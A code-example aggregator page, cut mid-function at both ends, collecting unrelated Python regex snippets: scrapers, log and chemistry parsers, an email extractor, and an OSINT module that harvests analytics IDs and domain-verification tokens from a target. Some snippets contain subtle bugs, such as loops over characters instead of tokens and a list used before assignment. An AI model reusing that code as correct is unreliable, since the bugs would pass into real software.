        for key, value in attrs.iteritems():
            value_is_regex = isinstance(value, re_type)
            value_is_str = isinstance(value, basestring)
            pattern = '''(<{tag}[^>]*\s{key}=(?P<delim>['"])(.*?)(?P=delim)[^>]*>)'''.format(tag=name, key=key)
            re_list = re.findall(pattern, item, re.M | re. S | re.I)
            if value_is_regex:
                this_list = [r[0] for r in re_list if re.match(value, r[2])]
            else:
                temp_value = [value] if value_is_str else value
                this_list = [r[0] for r in re_list if set(temp_value) <= set(r[2].split(' '))]
                
            if not this_list:
                has_space = (value_is_regex and ' ' in value.pattern) or (value_is_str and ' ' in value)
                if not has_space:
                    pattern = '''(<{tag}[^>]*\s{key}=((?:[^\s>]|/>)*)[^>]*>)'''.format(tag=name, key=key)
                    re_list = re.findall(pattern, item, re.M | re. S | re.I)
                    if value_is_regex:
                        this_list = [r[0] for r in re_list if re.match(value, r[1])]
                    else:
                        this_list = [r[0] for r in re_list if value == r[1]]
    
            if last_list is None:
                last_list = this_list
            else:
                last_list = [item for item in this_list if item in last_list]
        this_list = last_list
    
    return this_list
	def showCovers_adddetail_csfd(self, data, title):
		title_s = re.findall('<title>(.*?)\|', data, re.S)
		if title_s:
			if title_s[0] != "Vyhled\xc3\xa1v\xc3\xa1n\xc3\xad ":
				csfd_title = title_s[0]
			else:
				csfd_title = title
			print "EMC csfd: Movie name - %s" % csfd_title
		else:
			csfd_title = title
		bild = re.findall('<img src="(//img.csfd.cz/files/images/film/posters/.*?|//img.csfd.cz/posters/.*?)" alt="poster"', data, re.DOTALL | re.IGNORECASE)
		if bild:
			print "EMC csfd: Cover Select - %s" % title
			self.cover_count = self.cover_count + 1
			csfd_url = "http:" + bild[0].replace('\\','').strip()
			self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
			self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
			bild = re.findall('<h3>Plak.*?ty</h3>(.*?)</table>', data, re.S)
			if bild:
				bild1 = re.findall('style=\"background-image\: url\(\'(.*?)\'\)\;', bild[0], re.DOTALL | re.IGNORECASE)
				if bild1:
					for each in bild1:
						print "EMC csfd: Cover Select - %s" % title
						self.cover_count = self.cover_count + 1
						csfd_url = "http:" + each.replace('\\','').strip()
						self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
						self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
				else:
					print "EMC csfd 3 : no else covers - %s" % title
			else:
				print "EMC csfd 2 : no else covers - %s" % title
		else:
			print "EMC csfd 1 : keine infos gefunden - %s" % title
Beispiel #28
0
def ReadProtonCounts(inchi):
    import re

    #Get inchi layers
    layers = inchi.split('/')
    ProtLayer = ''
    FixedLayer = ''
    for l in layers[1:]:
        if 'C' in l and 'H' in l:
            atoms = re.findall(r"[a-zA-Z]+", l)
            indexes = [int(x) for x in re.findall(r"\d+", l)]
            formula = [list(x) for x in zip(atoms, indexes)]
        if 'h' in l and ProtLayer != '':
            FixedLayer = l[1:]
        if 'h' in l and ProtLayer == '':
            ProtLayer = l[1:]

    #initialize proton list
    nheavy = sum([x[1] for x in formula if x[0] != 'H'])

    #Find, save and remove tautomeric portions from main proton layer
    tautomerics = re.findall(r"\(.*?\)", ProtLayer)
    ProtLayer = re.sub(r"\(.*?\)", "", ProtLayer)
    if ProtLayer[-1] == ',':
        ProtLayer = ProtLayer[:-1]

    #Read the main and the fixed proton layer
    protons = ReadPSections(ProtLayer, nheavy)
    fprotons = ReadPSections(FixedLayer, nheavy)

    return protons, formula, tautomerics, fprotons
Beispiel #29
0
    def getCssLinks(self):
        """获取css文件中的链接(一般主要有图片和其他css文件)"""
        f = open(self.file)
        css = f.read()
        f.close()

        def getNewLink(cl):
            up = urlparse(self.url)
            if (not up.path) or ('../' not in cl):
                return cl

            cs = cl.count('../')+1
            newlink = up.scheme+'://'+up.netloc+'/'.join(up.path.split('/')[:-cs])
            newlink = re.sub(r'(\.\./)+', newlink+'/', cl)
            return newlink

        # 图片链接
        picLinks = re.findall(r'background:\s*url\s*\([\'\"]?([a-zA-Z0-9/\._-]+)[\'\"]?\)', css, re.I)
        # 其他css链接
        cssLinks = re.findall(r'@import\s*[\'\"]*([a-zA-Z0-9/\._-]+)[\'\"]*', css, re.I)
        Links = picLinks + cssLinks
        cLinks = []
        for cl in Links:
            cLinks.append(getNewLink(cl))

        return cLinks
Beispiel #30
0
def parse_log(log_file):
    with open(log_file, 'r') as log_file2:
        log = log_file2.read()

    loss_pattern = r"Iteration (?P<iter_num>\d+), loss = (?P<loss_val>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
    losses = []
    loss_iterations = []

    fileName= os.path.basename(log_file)
    for r in re.findall(loss_pattern, log):
        loss_iterations.append(int(r[0]))
        losses.append(float(r[1]))

    loss_iterations = np.array(loss_iterations)
    losses = np.array(losses)

    accuracy_pattern = r"Iteration (?P<iter_num>\d+), Testing net \(#0\)\n.* accuracy = (?P<accuracy>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
    accuracies = []
    accuracy_iterations = []
    accuracies_iteration_checkpoints_ind = []

    for r in re.findall(accuracy_pattern, log):
        iteration = int(r[0])
        accuracy = float(r[1]) * 100

        if iteration % 10000 == 0 and iteration > 0:
            accuracies_iteration_checkpoints_ind.append(len(accuracy_iterations))

        accuracy_iterations.append(iteration)
        accuracies.append(accuracy)

    accuracy_iterations = np.array(accuracy_iterations)
    accuracies = np.array(accuracies)
	
    return loss_iterations, losses, accuracy_iterations, accuracies, accuracies_iteration_checkpoints_ind, fileName
Beispiel #31
0
def camel_case_match(string):
    """
    Properly matches the camelCase naming style so that a name like
    writeXMLDocument gets parsed as ["write", "XML", "Document"].
    """
    return re.findall('(^[a-z]+|[A-Z][a-z]+|[A-Z]+|[0-9])(?![a-z])', string)
Beispiel #32
0
def parse_google_link(url):
    return url  # now it seems to be ok
    real = re.findall('http[^&]*&', url)[0]
    ret = urllib.unquote(real[:-1])
    return ret
Beispiel #33
0
def getImageList(html):
    reg = 'http[^"]*?\.jpg'
    imgre = re.compile(reg)
    imgList = re.findall(imgre,html)
    return imgList
Beispiel #34
0
def get_number_from_string(string):
    return [float(s) for s in re.findall(r"[-+]?\d*\.\d+|\d+", string)]
Beispiel #35
0
# Python for Informatics, Chapter 11, example 6 (page 132, section 11.2)
# Prints out all possible email addresses from a file
# (Anything that is string@string)
import re

hand = open('mbox-short.txt')
for line in hand:
    line = line.rstrip()
    x = re.findall('\S+@\S+', line)
    if len(x) > 0:
        print x
Beispiel #36
0
    def getArticleDetails(self, articles):
        print("Get Article Details...")
        artdic = {}
        # Define Webdriver
        driver = webdriver.Remote(
            command_executor='http://selenium-hub:4444/wd/hub',
            desired_capabilities=getattr(DesiredCapabilities, "FIREFOX"))
        RemoteConnection.set_timeout(36000)
        url = articles
        driver.get(url)

        # Get source code from page
        htmltext = driver.page_source
        soup = BeautifulSoup(htmltext, "lxml")
        driver.quit()
        # Extract field values and parse them to json / dictionary
        tempdic = {}
        try:
            tempdic['Article_ID'] = soup.find(
                "meta", attrs={"name": "parsely-post-id"})["content"]
        except:
            tempdic['Article_ID'] = "0"
        tempdic['URL'] = url
        tempdic['Title'] = soup.title.string
        tempdic['Author'] = soup.find("meta", attrs={"name":
                                                     "author"})["content"]

        # Loop to extract clean date
        tempdic['PublishingDate'] = \
            re.findall(r".+?(?=T)", soup.find("meta", property="article:published_time")["content"])[0]

        # Loop to extract no of responses and reading_time
        tempdic['Reading_time'] = re.findall(
            r"[0-9]",
            soup.find("meta", attrs={"name": "twitter:data1"})["value"])[0]
        try:
            tempdic['No_Responses'] = re.findall(
                r"[0-9]",
                soup.find("span", "az").string)[0]
        except:
            tempdic['No_Responses'] = 0

        # Loop to extract tags
        li = soup.select("ul > li > a")
        tags = []
        for link in li:
            tags.append(link.string)
        tempdic['Tags'] = tags

        # Loop to extract claps
        btns = soup.find_all("button")
        for button in btns:
            if button.string is None:
                pass
            else:
                try:
                    tempdic['Claps'] = (int(button.string))
                except:
                    break

        # Loop to get clean text
        pagetext = ""
        text = soup.findAll("p")
        for t in text:
            pagetext += t.getText()
        # Clean special characters
        pagetext = (" ".join(re.findall(r"[A-Za-z0-9]*",
                                        pagetext))).replace("  ", " ")
        tempdic['Text'] = pagetext
        artdic[url] = tempdic
        return (artdic)
Beispiel #37
0
def words(text): return re.findall('[a-z]+', text.lower()) 

DICTIONARY = set(words(file(config.SPELLCHECKER_TEXT).read()))
Beispiel #38
0
import re, operator


def update_location(tile, match):
    if match == 'e': direction = (2, 0)
    if match == 'se': direction = (1, -1)
    if match == 'sw': direction = (-1, -1)
    if match == 'w': direction = (-2, 0)
    if match == 'nw': direction = (-1, 1)
    if match == 'ne': direction = (1, 1)
    return tuple(map(operator.add, tile, direction))


flipped = set()

tiles = [line for line in open('input.txt').read().strip().split('\n')]
for tile in tiles:
    loc = (0, 0)
    matches = re.findall(r'(e|se|sw|w|nw|ne)', tile)
    for match in matches:
        loc = update_location(loc, match)
    if loc not in flipped:
        flipped.add(loc)
    else:
        flipped.remove(loc)
print(len(flipped))
Beispiel #39
0
x_val = 0
y_ch1 = 0
y_ch2 = 0

fieldnames = ["x_val", "y_ch1", "y_ch2"]

ser = serial.Serial()
ser.baudrate = 9600
ser.port = 'COM3'
ser.open()
print("Is open:", ser.is_open)

with open('data.csv', 'w') as csv_file:
    csv_writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
    csv_writer.writeheader()

while True:
    with open('data.csv', 'a') as csv_file:
        csv_writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
        channel1 = ser.readline()
        channel2 = ser.readline()
        res_ch1 = re.findall(r'\d+', str(channel1))
        res_ch2 = re.findall(r'\d+', str(channel2))
        y_ch1 = int(res_ch1[1])
        y_ch2 = int(res_ch2[1])
        print(int(res_ch1[0]), int(res_ch1[1]))
        print(int(res_ch2[0]), int(res_ch2[1]))
        info = {"x_val": x_val, "y_ch1": y_ch1, "y_ch2": y_ch2}
        csv_writer.writerow(info)
        x_val += 1
Beispiel #40
0
 def get_md5_file_name(file_path):
     file_name = os.path.basename(file_path)
     return re.findall(r"([a-fA-F\d]{32})", file_name)[0]
def toCamelCase(line):
  return re.findall(r'[A-Z](?:[a-z]+|[A-Z]*(?=[A-Z]|$))', line)
def process_text(doc_id, text):
  global tokens_count
  global title_file
  tokens = []
  links = []
  info_box = []
  body = []
  categories = []
  references = []

  #Convert to lower text
  text = text.lower()
  css = re.compile(r'{\|(.*?)\|}',re.DOTALL)
  cite = re.compile(r'{{v?cite(.*?)}}',re.DOTALL)
  files = re.compile(r'\[\[file:(.*?)\]\]',re.DOTALL)
  urls = re.compile(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',re.DOTALL)
  # junk = re.compile(r"[~`!@#$%-^*+{\[}\]\|\\<>/?]",re.DOTALL)

  # Categories
  catRegExp = r'\[\[category:(.*?)\]\]'
  categories = re.findall(catRegExp,text,flags=re.MULTILINE)
  categories = ' '.join(categories)
  #categories = junk.sub(' ',categories)
  # categories = categories.split()
  tokenList = re.split(r'[^A-Za-z0-9]+', categories)

  for word in categories:
    if(len(word)>1):
      add_to_invereted_index(word, doc_id, "c")


  # Infobox
  infoRegExp = r'{{infobox(.*?)}}'
  info_box = re.findall(infoRegExp,text,re.DOTALL)
  for infoList in info_box:
    tokenList = []
    tokenList = re.findall(r'=(.*?)\|',infoList,re.DOTALL)
    tokenList = ' '.join(tokenList)
    #tokenList = junk.sub(' ',tokenList)
    # tokenList = tokenList.split()
    tokenList = re.split(r'[^A-Za-z0-9]+', tokenList)
    
    for word in tokenList:
      if(len(word)>1):
        add_to_invereted_index(word, doc_id, "i")

  # References
  refRegExp = r'== ?references ?==(.*?)=='
  references = re.findall(refRegExp,text,flags=re.DOTALL)

  references = ' '.join(references)
  # print(references)
  #references = junk.sub(' ',references)
  # references = references.split()
  words = re.split(r'[^A-Za-z0-9]+', references)

  for word in references:
    if(len(word)>1):
      add_to_invereted_index(word, doc_id, "r")
      
  # External Links
  ei=0
  ci=len(text)
  try:
    ei = text.index('=external links=')+20
    ci = text.index('[[category:')+20
  except:
    pass

  links = text[ei:ci]
  links = re.findall(r'\[(.*?)\]',text,flags=re.MULTILINE)

  links = ' '.join(links)
  # print(references)
  #links = junk.sub(' ',links)
  # links = links.split()
  words = re.split(r'[^A-Za-z0-9]+', links)

  for word in links:
    if(len(word)>1):
      add_to_invereted_index(word, doc_id, "e")


  text = urls.sub('',text)
  text = cite.sub('',text)
  text = files.sub('',text)
  text = css.sub('',text)
  # text = junk.sub(' ',text)
  # text = remove_punctuation(text)
  words = re.split(r'[^A-Za-z0-9]+', text)
  tokens_count += len(words)
  title_file.write(str(len(words))+"\n")
  # words = text.split() 
  for word in words:
    if(len(word)>1 and len(word) < 46):
      add_to_invereted_index(word, doc_id, "b")
    def handleEvent(self, event):
        eventName = event.eventType
        srcModuleName = event.module
        eventData = event.data
        sourceData = self.sf.hashstring(eventData)

        if sourceData in self.results:
            self.sf.debug(f"Skipping {eventData}, already checked.")
            return None

        self.results[sourceData] = True

        self.sf.debug(f"Received event, {eventName}, from {srcModuleName}")

        if event.moduleDataSource:
            datasource = event.moduleDataSource
        else:
            datasource = "Unknown"

        if eventName == 'TARGET_WEB_CONTENT':
            # Google Analytics
            matches = re.findall(r"\bua\-\d{4,10}\-\d{1,4}\b", eventData, re.IGNORECASE)
            for m in matches:
                if m.lower().startswith('ua-000000-'):
                    continue
                if m.lower().startswith('ua-123456-'):
                    continue
                if m.lower().startswith('ua-12345678'):
                    continue

                self.sf.debug("Google Analytics match: " + m)
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Google Analytics: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Google AdSense
            matches = re.findall(r"\b(pub-\d{10,20})\b", eventData, re.IGNORECASE)
            for m in matches:
                if m.lower().startswith('pub-12345678'):
                    continue

                self.sf.debug("Google AdSense match: " + m)
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Google AdSense: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Google Website Verification
            # https://developers.google.com/site-verification/v1/getting_started
            matches = re.findall(r'<meta name="google-site-verification" content="([a-z0-9\-\+_=]{43,44})"', eventData, re.IGNORECASE)
            for m in matches:
                self.sf.debug("Google Site Verification match: " + m)
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Google Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            matches = re.findall(r'<meta name="verify-v1" content="([a-z0-9\-\+_=]{43,44})"', eventData, re.IGNORECASE)
            for m in matches:
                self.sf.debug("Google Site Verification match: " + m)
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Google Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Quantcast
            if '_qevents.push' in eventData:
                matches = re.findall(r"\bqacct:\"(p-[a-z0-9]+)\"", eventData, re.IGNORECASE)
                for m in matches:
                    self.sf.debug("Quantcast match: " + m)
                    evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                          "Quantcast: " + m,
                                          self.__name__, event)
                    evt.moduleDataSource = datasource
                    self.notifyListeners(evt)

            # Ahrefs Site Verification
            matches = re.findall(r'<meta name="ahrefs-site-verification" content="([a-f0-9]{64})"', eventData, re.IGNORECASE)
            for m in matches:
                self.sf.debug("Ahrefs Site Verification match: " + m)
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Ahrefs Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

        if eventName == 'DNS_TEXT':
            # Google Website Verification
            # https://developers.google.com/site-verification/v1/getting_started
            matches = re.findall(r'google-site-verification=([a-z0-9\-\+_=]{43,44})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Google Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # LogMeIn Domain Verification
            # https://support.logmeininc.com/openvoice/help/adding-a-txt-record-to-a-dns-server-ov710011
            matches = re.findall(r'logmein-domain-confirmation ([A-Z0-9]{24})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "LogMeIn Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            matches = re.findall(r'logmein-verification-code=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "LogMeIn Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # DocuSign Domain Verification
            # https://support.docusign.com/en/guides/org-admin-guide-domains
            matches = re.findall(r'docusign=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "DocuSign Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # GlobalSign Site Verification
            # https://support.globalsign.com/customer/en/portal/articles/2167245-performing-domain-verification---dns-txt-record
            matches = re.findall(r'globalsign-domain-verification=([a-z0-9\-\+_=]{42,44})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "GlobalSign Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Atlassian Domain Verification
            # https://confluence.atlassian.com/cloud/verify-a-domain-for-your-organization-873871234.html
            matches = re.findall(r'atlassian-domain-verification=([a-z0-9\-\+\/_=]{64})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Atlassian Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Adobe IDP Site Verification
            # https://helpx.adobe.com/au/enterprise/using/verify-domain-ownership.html
            matches = re.findall(r'adobe-idp-site-verification=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Adobe IDP Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            matches = re.findall(r'adobe-idp-site-verification=([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Adobe IDP Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Adobe Domain Verification
            # https://helpx.adobe.com/sign/help/domain_claiming.html
            matches = re.findall(r'adobe-sign-verification=([a-f0-9]{32})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Adobe Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Stripe Domain Verification
            # https://stripe.com/docs/apple-pay/web#going-live
            matches = re.findall(r'stripe-verification=([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Stripe Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)


            # TeamViewer SSO Verification
            # https://community.teamviewer.com/t5/Knowledge-Base/Single-Sign-On-SSO/ta-p/30784
            matches = re.findall(r'teamviewer-sso-verification=([a-f0-9]{32})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "TeamViewer SSO Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Aliyun Site Verification
            matches = re.findall(r'aliyun-site-verification=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Aliyun Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Facebook Domain Verification
            # https://developers.facebook.com/docs/sharing/domain-verification/
            matches = re.findall(r'facebook-domain-verification=([a-z0-9]{30})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Facebook Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Citrix Domain Verification
            matches = re.findall(r'citrix-verification-code=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Citrix Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Dropbox Domain Verification
            # https://help.dropbox.com/teams-admins/admin/domain-insights-account-capture#verify
            matches = re.findall(r'dropbox-domain-verification=([a-z0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Dropbox Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Detectify Domain Verification
            # https://support.detectify.com/customer/en/portal/articles/2836806-verification-with-dns-txt-
            matches = re.findall(r'detectify-verification=([a-f0-9]{32})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Detectify Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Drift Domain Verification
            matches = re.findall(r'drift-verification=([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Drift Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Ahrefs Site Verification
            # https://help.ahrefs.com/en/articles/1431155-how-do-i-finish-crawling-my-website-faster-in-site-audit
            matches = re.findall(r'ahrefs-site-verification_([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Ahrefs Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Statuspage.io Domain Verification
            # https://help.statuspage.io/help/domain-ownership
            matches = re.findall(r'status-page-domain-verification=([a-z0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Statuspage Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Zoom.us Domain Verification
            # https://support.zoom.us/hc/en-us/articles/203395207-What-is-Managed-Domain-
            matches = re.findall(r'ZOOM_verify_([a-z0-9\-\+\/_=]{22})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Zoom.us Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Mail.ru Domain Verification
            matches = re.findall(r'mailru-verification: ([a-z0-9]{16})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Mail.ru Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Yandex Domain Verification
            matches = re.findall(r'yandex-verification: ([a-z0-9]{16})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Yandex Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Brave Ledger Verification
            # https://support.brave.com/hc/en-us/articles/360021408352-How-do-I-verify-my-channel-
            matches = re.findall(r'brave-ledger-verification=([a-z0-9]+)$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Brave Ledger Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # have-i-been-pwned Verification
            matches = re.findall(r'have-i-been-pwned-verification=([a-f0-9]+)$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "have-i-been-pwned Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Cisco Live Domain Verification
            # https://www.ciscolive.com/c/dam/r/ciscolive/us/docs/2016/pdf/TECCOL-2982.pdf
            matches = re.findall(r'cisco-ci-domain-verification=([a-f0-9]+)$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Cisco Live Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

        return None
Beispiel #44
0
 def __parse_metadata_field(data: str) -> Dict[str, str]:
     metadata = {}
     for (_, key, value) in re.findall(r"<(xmp|pdfx|pdf|xmpMM):(.+)>(.+)</\1:\2>", data, re.I):
         metadata[key] = value
     return metadata
Beispiel #45
0
        if result:
            base_sign = base_signs.format(i)
            try:
                driver.find_element_by_xpath(base_sign).click()
            except Exception:
                print("第" + str(count) + "条数据出现超时,尝试再次连接")
                driver.find_element_by_xpath(base_sign).click()
            sleep(1)

            all_hand = driver.window_handles
            driver.switch_to.window(all_hand[-1])

            html = driver.page_source

            shop_name = driver.find_element_by_xpath('//h2').text
            shop_tel = ''.join(re.findall(r'客服电话:(.*?)</p>', html))
            shop_address = ''.join(re.findall(r'联系地址:(.*?)</p>', html))

            result = cursor.execute(sql_shop,
                                    [shop_name, shop_tel, shop_address])
            client.commit()
            if result:
                print("成功添加了" + str(num) + "条数据")
                num += 1
            driver.close()
            driver.switch_to.window(all_hand[0])

    print("第" + str(page) + "页的内容搜集完毕")

    # if goods_salas < 5:
    #     print("日销量5以下,不找啦")
Beispiel #46
0
def youkumovies():
    flag = 0
    boo = False
    countsum = 0
    lg = {
        '内地': '普通话',
        '韩国': '韩语',
        '美国': '英语',
        '俄罗斯': '俄语',
        '比利时': '比利时语',
        '香港': '粤语',
        '台湾': '台语',
        '日本': '日语',
        '其他': '其他',
        '泰国': '泰语',
        '欧洲': '英语',
        '印度': '印度语',
        '英国': '英语',
        '中国': '普通话'
    }
    url = 'http://list.youku.com/category/show/c_96_s_6_d_1_p_%d.html?spm=a2h1n.8251845.0.0'
    for ii in range(0, 29):
        flag += 1
        sum = 0
        print(
            '..........................正在添加第%d页的信息.........................' %
            (flag))
        page = url % (ii)
        req = requests.get(page)
        soup = BeautifulSoup(req.text, 'lxml')
        html = soup.find_all(class_='yk-col4 mr1')
        for n in html:
            sum += 1
            countsum += 1
            print(
                '>>>>>>>>>>>>>>>>>>>>>>>当前总共提取了 %d 条信息<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<'
                % (countsum))
            print(
                '---------------------正在添加第 %d 页的第 %d 条信息------------------------'
                % (flag, sum))
            if countsum >= 685:
                new_str = str(n)
                new_str = BeautifulSoup(new_str, 'lxml')
                html_str = str(new_str.find_all(class_='p-thumb')[0])
                # print(html_str)
                try:
                    info = re.findall(
                        'class="p-thumb"><a href="(.*?)" target="_blank"',
                        html_str, re.S)
                except IndexError as e:
                    info.append('')
                try:
                    info.append(
                        re.findall('target="_blank" title="(.*?)"></a>',
                                   html_str, re.S)[0].replace('\xa0', ''))
                except IndexError as e:
                    info.append('')
                try:
                    info.append(
                        re.findall('</div><img _src="(.*?)" alt="', html_str,
                                   re.S)[0])
                except IndexError as e:
                    info.append('')
                try:
                    info.append(
                        re.findall('<span class="vip-free">(.*?)</span>',
                                   html_str, re.S)[0])
                except IndexError as e:
                    info.append('')
                if not ('预告' in info[3]):
                    if (len(Movies.objects.filter(moviesname=info[1])) < 1):
                        dan_req = requests.get('http:' + info[0])
                        new_html = dan_req.text.replace('\\n', '').replace(
                            '\n', '').replace('\\', '')
                        try:
                            dan_url = 'https:' + re.findall(
                                'class="bg-dubo"></span>    <a href="(.*?)" target="_blank"',
                                new_html, re.S)[0]
                        except IndexError as e:
                            dan_url = 'https://www.baidu.com'
                        req = requests.get(dan_url)
                        y_html = BeautifulSoup(req.text, 'lxml')
                        try:
                            html_s = str(y_html.find_all(class_='p-base')[0])
                            tv_time = re.findall(
                                '<label>上映:</label>(.*?)</span></li>', html_s,
                                re.S)[0]
                            info.append(tv_time)
                        except IndexError as e:
                            info.append('')
                            html_s = ''
                        try:
                            tv_di = re.findall(
                                '</li><li>地区:.*target="_blank">(.*?)</a></li><li>类型:',
                                html_s, re.S)[0]
                            info.append(tv_di)
                        except IndexError as e:
                            info.append('')
